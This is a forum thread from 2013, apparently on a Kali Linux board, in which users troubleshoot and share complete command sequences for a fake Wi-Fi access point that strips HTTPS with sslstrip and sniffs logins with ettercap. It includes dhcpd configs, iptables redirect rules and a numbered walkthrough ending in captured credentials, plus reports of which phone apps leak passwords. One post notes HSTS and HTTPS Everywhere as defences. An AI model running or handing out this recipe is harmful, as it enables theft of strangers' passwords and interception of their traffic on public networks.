Page 1 of 2 12 LastLast
Results 1 to 50 of 51

Thread: Fake access point + ettercap + sslstrip

  1. #1
    Join Date
    2013-Mar
    Posts
    12

    Fake access point + ettercap + sslstrip

    Hi all

    I want to make a fake access point to sniff https passwords, I started the fake access point ((airmong-ng)), and done the iptables forwoarding and dhcp configuration, every thing is good till now, clients get connected and can browse internet, butwhen i start ettercap and sslstrip I can't get any https passwords, the client still browsing, but no passowrds at all, tried many tutorials with diferent configurations but no way, seems like there is some thing wrong with sslstrip.
    any way here is my configurations:

    wireless=wlan0
    internet=eth0

    airbase-ng -c 1 -e free-wifi mon0
    ifconfig at0 up &&
    ifconfig at0 10.0.0.1 netmask 255.255.255.0 &&
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &&
    dhcpd


    iptables --flush && iptables --table nat --flush && iptables --delete-chain &&
    iptables --table nat --delete-chain &&
    iptables --append FORWARD --in-interface at0 -j ACCEPT &&
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE &&
    echo 1 > /proc/sys/net/ipv4/ip_forward &&
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ##gateway on eth0

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    ettercap -Tqi at0 -M arp:remote // //
    sslstrip -akf


    dhcpd configurations are correct cause clients get connected and can browse internet,
    but as I said no https passwords,

    when I run sslstrip I got this:

    slstrip 0.9 by Moxie Marlinspike running...
    Unhandled error in Deferred:
    Unhandled Error
    Traceback (most recent call last):
    File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 551, in _runCallbacks
    current.result = callback(current.result, *args, **kw)
    File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 250, in _checkTimeout
    userDeferred.callback(result)
    File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 368, in callback
    self._startRunCallbacks(result)
    File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 464, in _startRunCallbacks
    self._runCallbacks()
    --- <exception caught here> ---
    File "/usr/lib/python2.7/dist-packages/twisted/internet/defer.py", line 551, in _runCallbacks
    current.result = callback(current.result, *args, **kw)
    File "/usr/share/sslstrip/sslstrip/ClientRequest.py", line 115, in handleHostResolvedError
    self.finish()
    File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 866, in finish
    "Request.finish called on a request after its connection was lost; "
    exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.



    can you tell me what I'm missing here,
    thank's all..
    anas.
    Last edited by anashlali; 2013-07-07 at 20:19. Reason: update

  2. #2
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    gedit /etc/dhcpd.conf
    ######################################
    authoritative;

    default-lease-time 700;
    max-lease-time 8000;

    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;

    option domain-name "HOME";
    option domain-name-servers 10.0.0.1;

    range 10.0.0.30 10.0.0.60;

    }
    ##############################################
    airmon-ng start wlan1 11
    airbase-ng -c 11 -e HOME mon0
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start
    ################################################## ####
    root@hk3r:~# sslstrip -f -p -k 10000
    ##########################################
    root@hk3r:~# ettercap -p -u -T -q -i at0
    ############################################

    in MY-kali worked-fine:
    http://imageshack.us/f/89/1ld1.png/
    Last edited by zimmaro; 2013-12-08 at 11:00.

  3. #3
    Join Date
    2013-Mar
    Posts
    3
    Quote Originally Posted by zimmaro View Post
    gedit /etc/dhcpd.conf
    ######################################
    authoritative;

    default-lease-time 700;
    max-lease-time 8000;

    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;

    option domain-name "HOME";
    option domain-name-servers 10.0.0.1;

    range 10.0.0.30 10.0.0.60;

    }
    ##############################################
    root@hk3r:~# airmon-ng start wlan1 11
    root@hk3r:~# ifconfig at0 10.0.0.1 netmask 255.255.255.0
    root@hk3r:~# ifconfig at0 mtu 1400
    root@hk3r:~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    root@hk3r:~# iptables --flush
    root@hk3r:~# iptables --table nat --flush
    root@hk3r:~# iptables --delete-chain
    root@hk3r:~# iptables --table nat --delete-chain
    root@hk3r:~# echo 1 > /proc/sys/net/ipv4/ip_forward
    root@hk3r:~# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    root@hk3r:~# iptables -P FORWARD ACCEPT
    root@hk3r:~# iptables --append FORWARD --in-interface at0 -j ACCEPT
    root@hk3r:~# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    root@hk3r:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    root@hk3r:~# dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    root@hk3r:~# /etc/init.d/isc-dhcp-server start
    ################################################## ####
    root@hk3r:~# sslstrip -f -p -k 10000
    ##########################################
    root@hk3r:~# ettercap -p -u -T -q -i at0
    ############################################

    in MY-kali worked-fine:
    http://imageshack.us/f/89/1ld1.png/
    thanks a lot zimmaro

    this is very interesting! useful, simple and effective!

  4. #4
    Join Date
    2013-Mar
    Posts
    12
    @zimmaro

    thanx man..
    I just reactivate forwording again (( echo 1 > /proc/sys/net/ipv4/ip_forward )) and it's working with my configurations, I think ettercap need -p -u to work without stoping ip forwording so I just reactivate it again.
    I'll test your configurations,,,, thank's again

  5. #5
    Join Date
    2013-Apr
    Posts
    10
    Hello,

    Could you please post the complete steps of this setup with some explanation or request you to point some useful article.

    Thanks in advance.

  6. #6
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by graytips View Post
    Hello,

    Could you please post the complete steps of this setup with some explanation or request you to point some useful article.

    Thanks in advance.
    hi
    i made a """video"" of this a.... month ago. ...on my vimeo...if you want to take a look...
    http://vimeo.com/73069192


    PSrevious need to install isc-dhcp-server

    bye
    Last edited by zimmaro; 2013-10-15 at 07:29.

  7. #7
    Join Date
    2013-Nov
    Posts
    68
    Help assist,

    I got it to worked but now errors with SSLSTRIP

    ################################################## ##########################
    sslstrip 0.9 by Moxie Marlinspike running...
    Unhandled Error
    Traceback (most recent call last):
    File "/usr/bin/sslstrip", line 105, in main
    reactor.run()
    File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1169, in run
    self.mainLoop()
    File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1181, in mainLoop
    self.doIteration(t)
    File "/usr/lib/python2.7/dist-packages/twisted/internet/pollreactor.py", line 167, in doPoll
    log.callWithLogger(selectable, _drdw, selectable, fd, event)
    --- <exception caught here> ---
    File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
    File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
    ################################################## ##################################
    Last edited by thepoor; 2013-11-13 at 18:42.

  8. #8
    Join Date
    2013-Nov
    Posts
    68
    Finally, got it to work. And it's very scary, I will not use public wifi to check my email or anything except check the weather and read the news.

    Thanks for the fantastic tutorial.
    Last edited by thepoor; 2013-11-14 at 12:34.

  9. #9
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by thepoor View Post
    Finally, got it to work. And it's very scary, I will not use public wifi to check my email or anything except check the weather and read the news.

    Thanks for the fantastic tutorial.

    TNX
    well ... make no mistake ... I .. use .. still .. the "pigeon-traveler"

  10. #10
    Join Date
    2013-Sep
    Posts
    14
    Will this also capture android devices on the network?
    Anybody any experience with it?

  11. #11
    Join Date
    2013-Nov
    Posts
    68
    Quote Originally Posted by Attilafx View Post
    Will this also capture android devices on the network?
    Anybody any experience with it?
    I would say any devices that uses a browser to access their email, bank, etc.

  12. #12
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by Attilafx View Post
    Will this also capture android devices on the network?
    Anybody any experience with it?
    I have no experience on this ... and it is not always obvious! (some browsers & providers are "" "intractable". ") ... but on my Android(SlimSaber 4.3.1) SEEMS to work in my little-test:
    https://vimeo.com/79988268

    PS:sorry for "very-low"quality....but ...i'm clumsy in handling 2 ""video-devices" in sync

  13. #13
    Join Date
    2013-Jun
    Posts
    123
    Quote Originally Posted by zimmaro View Post

    TNX
    well ... make no mistake ... I .. use .. still .. the "pigeon-traveler"
    What is pigeon-traveler? Sounds interesting.

  14. #14
    Join Date
    2013-Nov
    Location
    Houston
    Posts
    5
    Quote Originally Posted by zimmaro View Post
    ...
    option domain-name-servers 10.0.0.1;
    ...
    root@hk3r:~# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    ...
    I've two question:
    1- into dhcpd.conf you have specified an dns server. Is configured on 192.168.1.1 and the client use it?
    2- is used the rule "...PREROUTING -p udp -j DNAT..." to permit dns request by client?

    thank you very much

  15. #15
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by alfoc View Post
    I've two question:
    1- into dhcpd.conf you have specified an dns server. Is configured on 192.168.1.1 and the client use it?
    2- is used the rule "...PREROUTING -p udp -j DNAT..." to permit dns request by client?

    thank you very much
    hi alfoc
    I'm not really likely to give a correct technique-response (I'm a g0at-tester)
    I can try to explain it in MY ignorant-way:
    I THINK that this "rule" is closely linked to the fact that the "" victim "" can navigate
    Hang the PREROUTING chain (-A PREROUTING) of the NAT table (-t nat) the rule that all udp packets (-p udp) are "up to date" by changing the destination address (-j DNAT) to 192.168.1.1 (router of my-lan-connection-KALI)

    sorry for my "bad"" replies && my bad english
    if someone more prepared than me can help you........&&..me
    bye
    Last edited by zimmaro; 2013-11-26 at 17:06.

  16. #16
    Join Date
    2013-Nov
    Posts
    2
    so from what i did understood there its that the nat of "fakeap" works just like the nat of a vm ?

  17. #17
    Join Date
    2013-Nov
    Location
    Houston
    Posts
    5
    Quote Originally Posted by zimmaro View Post
    I have no experience on this ... and it is not always obvious! (some browsers & providers are "" "intractable". ") ... but on my Android(SlimSaber 4.3.1) SEEMS to work in my little-test:
    https://vimeo.com/79988268

    PS:sorry for "very-low"quality....but ...i'm clumsy in handling 2 ""video-devices" in sync
    ok, it works, but can you try again load for example gmail account with "gmail app on android"... it works?

  18. #18
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by alfoc View Post
    ok, it works, but can you try again load for example gmail account with "gmail app on android"... it works?
    i made a fast test in my 4.3.1:
    confirmed DON't work with .apks with pre-configured account (i've refresh & sincronizzed)
    gmail.apk >>>no sniff
    yahoo.apk>>>no sniff
    AquaMail.apk setting pluri-accounts>>> no sniff hotmail..BUT ..sniff TWO "italian-mail-providers"
    bye

  19. #19
    Join Date
    2013-Nov
    Location
    Houston
    Posts
    5
    Quote Originally Posted by zimmaro View Post
    i made a fast test in my 4.3.1:
    confirmed DON't work with .apks with pre-configured account (i've refresh & sincronizzed)
    gmail.apk >>>no sniff
    yahoo.apk>>>no sniff
    AquaMail.apk setting pluri-accounts>>> no sniff hotmail..BUT ..sniff TWO "italian-mail-providers"
    bye
    I agree and no one says it!
    I think gmail/facebook/twitter apps works only with 443 port, so sslstrip is useless for them
    It's a big issue for a fake-AP. Nowadays all users use applications via smartphone to read email etc.

  20. #20
    Join Date
    2013-Mar
    Location
    Timor Leste
    Posts
    6
    Did the victim not receive any warning, when you attack the https, ? It seems when the attacks happen, it forces the victim to use http. Thanks
    [COLOR="#0000CD"][FONT=Comic Sans MS]Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime.[/FONT][/COLOR]

  21. #21
    Join Date
    2013-Dec
    Location
    Milano
    Posts
    10
    Hi all,
    I tried the configuration of Zimmaro, but the traffic is not forwarded from at0 to etho
    I checked the rules of route seems to be ok.

    you have any idea?


    Code:
    root@kali-Cris:/home/cristian# route
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
    default         192.168.255.1      0.0.0.0             UG    0        0        0   eth0
    10.0.0.0        10.0.0.254      255.255.255.0       UG    0        0        0    at0
    10.0.0.0               *              255.255.255.0        U     0      0        0 at0
    192.168.255.0        *            255.255.255.0   U     0      0        0 eth0
    
    
    
    root@kali-Cris:/home/cristian# iptables -nvL
    Chain INPUT (policy ACCEPT 2261 packets, 1556K bytes)
     pkts bytes target     prot opt in     out     source               destination         
    
    Chain FORWARD (policy ACCEPT 700 packets, 69601 bytes)
     pkts bytes target     prot opt in     out     source               destination         
     1877  248K ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0           
        0     0 ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0           
    
    Chain OUTPUT (policy ACCEPT 2415 packets, 644K bytes)
     pkts bytes target     prot opt in     out     source               destination

  22. #22
    Join Date
    2013-Nov
    Location
    Houston
    Posts
    5
    Quote Originally Posted by Crix75ita View Post
    Hi all,
    I tried the configuration of Zimmaro, but the traffic is not forwarded from at0 to etho
    I checked the rules of route seems to be ok.

    you have any idea?


    Code:
    root@kali-Cris:/home/cristian# route
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
    default         192.168.255.1      0.0.0.0             UG    0        0        0   eth0
    10.0.0.0        10.0.0.254      255.255.255.0       UG    0        0        0    at0
    10.0.0.0               *              255.255.255.0        U     0      0        0 at0
    192.168.255.0        *            255.255.255.0   U     0      0        0 eth0
    
    
    
    root@kali-Cris:/home/cristian# iptables -nvL
    Chain INPUT (policy ACCEPT 2261 packets, 1556K bytes)
     pkts bytes target     prot opt in     out     source               destination         
    
    Chain FORWARD (policy ACCEPT 700 packets, 69601 bytes)
     pkts bytes target     prot opt in     out     source               destination         
     1877  248K ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0           
        0     0 ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0           
    
    Chain OUTPUT (policy ACCEPT 2415 packets, 644K bytes)
     pkts bytes target     prot opt in     out     source               destination
    I guess that your rules are incorrect. You should have "eth0" interface into FORWARD rules, not "at0". Like this:

    Chain FORWARD (policy ACCEPT 6434 packets, 740K bytes)
    pkts bytes target prot opt in out source destination
    7264 6007K ACCEPT all -- eth0 * 0.0.0.0/0 0.0.0.0/0

    My rules:

    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface eth0 -j ACCEPT
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

  23. #23
    Join Date
    2013-Nov
    Location
    Houston
    Posts
    5
    Quote Originally Posted by abraoximenes View Post
    Did the victim not receive any warning, when you attack the https, ? It seems when the attacks happen, it forces the victim to use http. Thanks
    Transparent for an "occasional" user. An "advanced" user might notice that the connection use HTTP and not HTTPS.
    If the attacker use sslstrip with "-f" option, an advanced user might notice the unusual favicon.

    Notes: sslstrip doesn't works if

    - the client requests an address with HTTPS directly, for example HTTPS://www.example.com;
    - the web site have the support for HSTS, that forces a browser to solely interact with the server using HTTPS;
    - the client is a smartphone AND the user use an app (app like gmail, facebook etc. works only with HTTPS). I guess is not so for all applications...;

    * notes by http://blog.csnc.ch/tag/sslstrip/

    "The very initial request to a HSTS web site may still be http and thus exposed to a standard Man-In-The-Middle attack (Bootstrap MITM). In that phase, an attacker could tamper with the HSTS response header and inject invalid subdomains (DoS), disable HSTS (set max-age to 0) or poison the HSTS cache of the user agent otherwise. However, wrongly stored HSTS policies can be simply removed by clearing the local browser cache."

    * HSTS: "HTTP Strict Transport Security (HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. It also prevents HTTPS click through prompts on browsers." (https://www.owasp.org/index.php/HTTP...sport_Security)

    Useful install "HTTPS Everywhere" an extension for Firefox and Chrome (https://www.eff.org/https-everywhere).

  24. #24
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301

    Smile

    Quote Originally Posted by Crix75ita View Post
    Hi all,
    I tried the configuration of Zimmaro, but the traffic is not forwarded from at0 to etho
    I checked the rules of route seems to be ok.

    you have any idea?


    Code:
    root@kali-Cris:/home/cristian# route
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
    default         192.168.255.1      0.0.0.0             UG    0        0        0   eth0
    10.0.0.0        10.0.0.254      255.255.255.0       UG    0        0        0    at0
    10.0.0.0               *              255.255.255.0        U     0      0        0 at0
    192.168.255.0        *            255.255.255.0   U     0      0        0 eth0
    
    
    
    root@kali-Cris:/home/cristian# iptables -nvL
    Chain INPUT (policy ACCEPT 2261 packets, 1556K bytes)
     pkts bytes target     prot opt in     out     source               destination         
    
    Chain FORWARD (policy ACCEPT 700 packets, 69601 bytes)
     pkts bytes target     prot opt in     out     source               destination         
     1877  248K ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0           
        0     0 ACCEPT     all  --  at0    *       0.0.0.0/0            0.0.0.0/0           
    
    Chain OUTPUT (policy ACCEPT 2415 packets, 644K bytes)
     pkts bytes target     prot opt in     out     source               destination
    hi cris
    if this can help:
    in ""my""route with ""my""configuration seems to I have" little-little-different" result in last line..(i think-but i'm not sure is for it)
    my example scenario:
    ATTACKER:kali1.05-32bit on vmplayer with alfa36nh (used posted-configuration-for fakeAP) connected lan-eth0 (BRIDGE) to my Alice-gateway
    VICTIM:notebook win7sp1(FULLY-patched&&AV&&firewallUP)connected to fakeAP(kali) via WI-FI internal-interface (NOT HAVE message restricted-access!!!) free navigation-web to ES:gmail & hotmail
    IP ATTACKER-eth0=192.168.1.7
    IP victim -wi-fi=192.168.1.3
    IP ROUTER(alice)=192.168.1.1
    http://imageshack.us/f/22/id9v.png/

    bye sorry my english!!
    @zoom 1600x1200
    Last edited by zimmaro; 2013-12-08 at 09:16.

  25. #25
    Join Date
    2013-Dec
    Location
    Milano
    Posts
    10
    Tanks all for your support,
    i tried more times, but the kali machine don't forward the packets. from at0 to internet eth0.

    My scenario:
    Attacker Kali ETH0 192.168.255.11/24 gw 192.168.255.1 " the last address it's my router to internet "
    Attacker Kali AT0 192.168.5.1/24
    Victim WIFI 192.168.5.31 " the victim it's connected on fake-ap and, a can ping the Kali netowrk 192.168.5.1 "

    Sorry for my bad english
    thanks

    Cris

  26. #26
    Join Date
    2013-Dec
    Location
    Milano
    Posts
    10
    Hi all,
    I did some tests and I saw that if I use the ping command from victim to a public ip "Example 8.8.8.8", the ping works, but if I try to ping a host using the name "example google.it" does not work . as if there was a problem with the name resolution via iptables.
    I check network parameters set by DHCP and are all correct, ip, gateway, and dns, "example i use the 8.8.8.8 or 8.8.4.4" as dhcpd.conf

    have you any idea?
    Thanks to all.

    Cris

  27. #27
    Join Date
    2013-Nov
    Posts
    68
    Crix,

    Can you post the steps that you do? it would be easier for us to debug it for you. I was having the same issue with the connection but I figured it out.

  28. #28
    Join Date
    2013-Dec
    Location
    Milano
    Posts
    10
    Quote Originally Posted by thepoor View Post
    Crix,

    Can you post the steps that you do? it would be easier for us to debug it for you. I was having the same issue with the connection but I figured it out.
    Ok, i follow the same procedure, of Zimmaro:

    1 - set the wireless card in monitor mode:
    Code:
    airmon-ng start wlan0 11
    
    Found 3 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e 
    PID	Name
    2436	NetworkManager
    2531	wpa_supplicant
    2543	dhclient
    
    
    Interface	Chipset		Driver
    
    wlan0		Intel 3945ABG	iwl3945 - [phy0]
    				(monitor mode enabled on mon0)
    2 - start the fake access point :

    Code:
    root@kali-Cris:/home/cristian# airbase-ng -c 11 -e FAKE-IT mon0
    15:55:41  Created tap interface at0
    15:55:41  Trying to set MTU on at0 to 1500
    15:55:41  Trying to set MTU on mon0 to 1800
    15:55:41  Access Point with BSSID 00:1F:xx:xx:xx:xx started.
    3 - set the at0 interface
    Code:
    root@kali-Cris:/home/cristian# ifconfig at0
    at0       Link encap:Ethernet  HWaddr 00:1f:xx:xx:xx:xx 
              inet addr:192.168.5.1  Bcast:192.168.5.255  Mask:255.255.255.0
              inet6 addr: fe80::21f:3cff:fe35:2930/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1400  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:500 
              RX bytes:0 (0.0 B)  TX bytes:468 (468.0 B)
    4 - set the route for network 192.168.5.0/24
    Code:
    root@kali-Cris:/home/cristian# route 
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
    default         192.168.255.1   0.0.0.0         UG    0      0        0 eth0
    192.168.5.0     192.168.5.1     255.255.255.0   UG    0      0        0 at0
    192.168.5.0     *               255.255.255.0   U     0      0        0 at0
    192.168.255.0   *               255.255.255.0   U     0      0        0 eth0
    5 - edit the dhcpd.conf
    Code:
    root@kali-Cris:/home/cristian# cat /etc/dhcpd.conf
    
    subnet 192.168.5.0 netmask 255.255.255.0 {
    authoritative;
    range 192.168.5.30 192.168.5.60;
    default-lease-time 700;
    max-lease-time 8000;
    option subnet-mask 255.255.255.0;
    option routers 192.168.5.1;
    option domain-name-servers 8.8.8.8;
    option broadcast-address 192.168.5.255;
    }
    6 - run dhcp service
    Code:
    root@kali-Cris:/home/cristian# dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    Internet Systems Consortium DHCP Server 4.2.2
    Copyright 2004-2011 Internet Systems Consortium.
    All rights reserved.
    For info, please visit https://www.isc.org/software/dhcp/
    Wrote 3 leases to leases file.
    Listening on LPF/at0/00:1f:xx:xx:xx:xx/192.168.5.0/24
    Sending on   LPF/at0/00:1f:xx:xx:xx:xx/192.168.5.0/24
    Sending on   Socket/fallback/fallback-net
    
    root@kali-Cris:/home/cristian# /etc/init.d/isc-dhcp-server start
    [ ok ] Starting ISC DHCP server: dhcpd.
    7 - set ip forwarding
    Code:
    root@kali-Cris:/home/cristian# echo 1 > /proc/sys/net/ipv4/ip_forward 
    root@kali-Cris:/home/cristian# cat /proc/sys/net/ipv4/ip_forward 
    1
    8 - clean iptables rules
    Code:
    root@kali-Cris:/home/cristian# iptables --flush
    root@kali-Cris:/home/cristian# iptables --table nat --flush
    root@kali-Cris:/home/cristian# iptables --delete-chain
    root@kali-Cris:/home/cristian# iptables --table nat --delete-chain
    9 - Verify the rules
    Code:
    root@kali-Cris:/home/cristian# iptables-save > /home/cristian/Start.rules
    root@kali-Cris:/home/cristian# cat /home/cristian/Start.rules 
    # Generated by iptables-save v1.4.14 on Tue Dec 10 16:11:40 2013
    *nat
    :PREROUTING ACCEPT [44:4885]
    :INPUT ACCEPT [44:4885]
    :OUTPUT ACCEPT [8:474]
    :POSTROUTING ACCEPT [8:474]
    COMMIT
    # Completed on Tue Dec 10 16:11:40 2013
    # Generated by iptables-save v1.4.14 on Tue Dec 10 16:11:40 2013
    *filter
    :INPUT ACCEPT [184:27160]
    :FORWARD ACCEPT [0:0]
    :OUTPUT ACCEPT [67:19370]
    COMMIT
    # Completed on Tue Dec 10 16:11:40 2013
    - 10 set a new rules
    Code:
    root@kali-Cris:/home/cristian# iptables --append FORWARD --in-interface at0 -j ACCEPT
    root@kali-Cris:/home/cristian# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    root@kali-Cris:/home/cristian# iptables -P FORWARD ACCEPT
    root@kali-Cris:/home/cristian# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.255.1
    11 - verify
    Code:
    root@kali-Cris:/home/cristian# iptables-save > /home/cristian/New.rules
    root@kali-Cris:/home/cristian# cat /home/cristian/New.rules 
    # Generated by iptables-save v1.4.14 on Tue Dec 10 16:15:17 2013
    *nat
    :PREROUTING ACCEPT [5:208]
    :INPUT ACCEPT [5:208]
    :OUTPUT ACCEPT [0:0]
    :POSTROUTING ACCEPT [0:0]
    -A PREROUTING -p udp -j DNAT --to-destination 192.168.255.1
    -A POSTROUTING -o eth0 -j MASQUERADE
    COMMIT
    # Completed on Tue Dec 10 16:15:17 2013
    # Generated by iptables-save v1.4.14 on Tue Dec 10 16:15:17 2013
    *filter
    :INPUT ACCEPT [21:2049]
    :FORWARD ACCEPT [0:0]
    :OUTPUT ACCEPT [9:392]
    -A FORWARD -i at0 -j ACCEPT
    COMMIT
    # Completed on Tue Dec 10 16:15:17 2013
    ok in this situation, i can pinging a public address from victim's pc, on FAKE AP, in internet, but the victim pc's don't resolve the host names.

    Test from victim pc's:
    Code:
    ^CMacBook-Pro-di-Cristian:~ Cristian$ ping 8.8.8.8
    PING 8.8.8.8 (8.8.8.8): 56 data bytes
    64 bytes from 8.8.8.8: icmp_seq=0 ttl=49 time=48.580 ms
    64 bytes from 8.8.8.8: icmp_seq=1 ttl=49 time=77.322 ms
    64 bytes from 8.8.8.8: icmp_seq=2 ttl=49 time=61.213 ms
    Request timeout for icmp_seq 3
    64 bytes from 8.8.8.8: icmp_seq=4 ttl=49 time=74.385 ms
    64 bytes from 8.8.8.8: icmp_seq=5 ttl=49 time=73.112 ms
    64 bytes from 8.8.8.8: icmp_seq=6 ttl=49 time=73.091 ms
    64 bytes from 8.8.8.8: icmp_seq=7 ttl=49 time=72.951 ms
    64 bytes from 8.8.8.8: icmp_seq=8 ttl=49 time=107.321 ms
    64 bytes from 8.8.8.8: icmp_seq=9 ttl=49 time=61.472 ms
    64 bytes from 8.8.8.8: icmp_seq=10 ttl=49 time=70.749 ms
    64 bytes from 8.8.8.8: icmp_seq=11 ttl=49 time=75.128 ms
    64 bytes from 8.8.8.8: icmp_seq=12 ttl=49 time=68.981 ms
    Request timeout for icmp_seq 13
    
    --- 8.8.8.8 ping statistics ---
    15 packets transmitted, 12 packets received, 20.0% packet loss
    round-trip min/avg/max/stddev = 48.580/72.025/107.321/13.169 ms
    
    ^CMacBook-Pro-di-Cristian:~ Cristian$ ping google.it
    ping: cannot resolve google.it: Unknown host
    MacBook-Pro-di-Cristian:~ Cristian$
    Thanks
    :-D

    Cris

  29. #29
    Join Date
    2013-Nov
    Posts
    68
    Crix,

    You left out the important step, you need to set which interface has access to the internet. (if ethernet, eth0. If one of your wireless, wlan0 or wlan1) first.
    wireless=wlan1
    internet=eth0

    I have it works for me, so follow my steps to see if it works for you:

    Step 1:
    wireless=wlan1 //AP interface
    internet=eth0 //interface with internet access. if it's your wireless (usually wlan0) , change it to wlan0 then also change wherever you see eth0 with wlan0.

    Step 2:
    gedit /etc/dhcpd.conf
    #######################
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.2.130 192.168.2.140;
    }
    #########
    Step 3:
    airmon-ng start wlan1
    airbase-ng -e "AnyNameHere" -c 12 mon0
    ifconfig at0 up
    ifconfig at0 192.168.2.129 netmask 255.255.255.128
    route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    echo 1 > /proc/sys/net/ipv4/ip_forward
    /etc/init.d/isc-dhcp-server start

    step 4: open another terminal

    sslstrip -f -p -k 10000

    Step 5: open another terminal

    ettercap -p -u -T -q -i at0

    step 6: use your device open browser and try to go to yahoo.com or google.com login and you will see the info.
    Last edited by thepoor; 2013-12-11 at 13:22.

  30. #30
    Join Date
    2013-Dec
    Location
    Milano
    Posts
    10
    Yes It works, using only these three rules:
    Code:
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    in the original post was also

    Code:
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    iptables -P FORWARD ACCEPT
    Ok .
    thanks alot

    Csis

  31. #31
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    hi
    thanks for share
    with this config...in MY-CASE i've error to start isc-dhcp-server

  32. #32
    Join Date
    2013-Nov
    Posts
    68
    Quote Originally Posted by zimmaro View Post
    hi
    thanks for share
    with this config...in MY-CASE i've error to start isc-dhcp-server
    Can you post the error message?

  33. #33
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by thepoor View Post
    Can you post the error message?
    nothing.. solve ..delete old logs & now the server start!!!
    ...but i don't connect to fake_AP....

  34. #34
    Join Date
